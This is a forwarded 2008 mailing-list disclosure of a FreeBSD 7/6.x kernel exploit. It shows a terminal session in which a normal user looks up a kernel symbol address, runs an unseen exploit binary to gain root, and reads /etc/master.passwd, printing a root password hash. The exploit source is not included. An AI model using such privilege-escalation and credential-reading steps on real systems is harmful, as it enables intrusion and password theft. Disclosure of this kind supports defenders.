[security-alerts] Fwd: [Full-disclosure] FreeBSD 7/6x protosw kernel exploit

["Vladimir '3APA3A' Dubrovin" <3APA3A@xxxxxxxxxxxxxxxx>]

ìÏËÁÌØÎÙÊ, ÎÏ ×ÓÅ ÒÁ×ÎÏ ÉÎÔÅÒÅÓÎÏ.

--This is a forwarded message
From: don bailey <don.bailey@xxxxxxxxx>
To: dailydave@xxxxxxxxxxxxxxxxxxxxx <dailydave@xxxxxxxxxxxxxxxxxxxxx>
Date: Friday, December 26, 2008, 11:28:32 AM
Subject: [Full-disclosure] FreeBSD 7/6x protosw kernel exploit

===8<==============Original message text===============
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> uname -rs
FreeBSD 7.0-RELEASE
> id
uid=1001(donb) gid=1001(donb) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
grep: /etc/master.passwd: Permission denied
> nm /boot/kernel/kernel | grep allproc
c0bf26b8 B allproc
c0bf2670 B allproc_lock
> cc -o x x.c
> ./x 0xc0bf26b8
euid=0
> id
uid=1001(donb) gid=1001(donb) euid=0(root) groups=1001(donb),0(wheel)
> grep ^root /etc/master.passwd
root:$1$fuS6o3Qy$iFlUEpD9Y3ph7rOzMU/br1:0:0::0:0:Charlie &:/root:/bin/csh
>

Happy holidays, all!

D
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEARECAAYFAklUla4ACgkQttfe3HwtctN/fgCeJDmmpOK8bn1dnssxOkTZXdUg
idUAmwdyoMZnoEfnrR14TQlRDli9mv+j
=Pixh
-----END PGP SIGNATURE-----

===8<===========End of original message text===========


-- 
~/ZARAZA
http://securityvulns.com/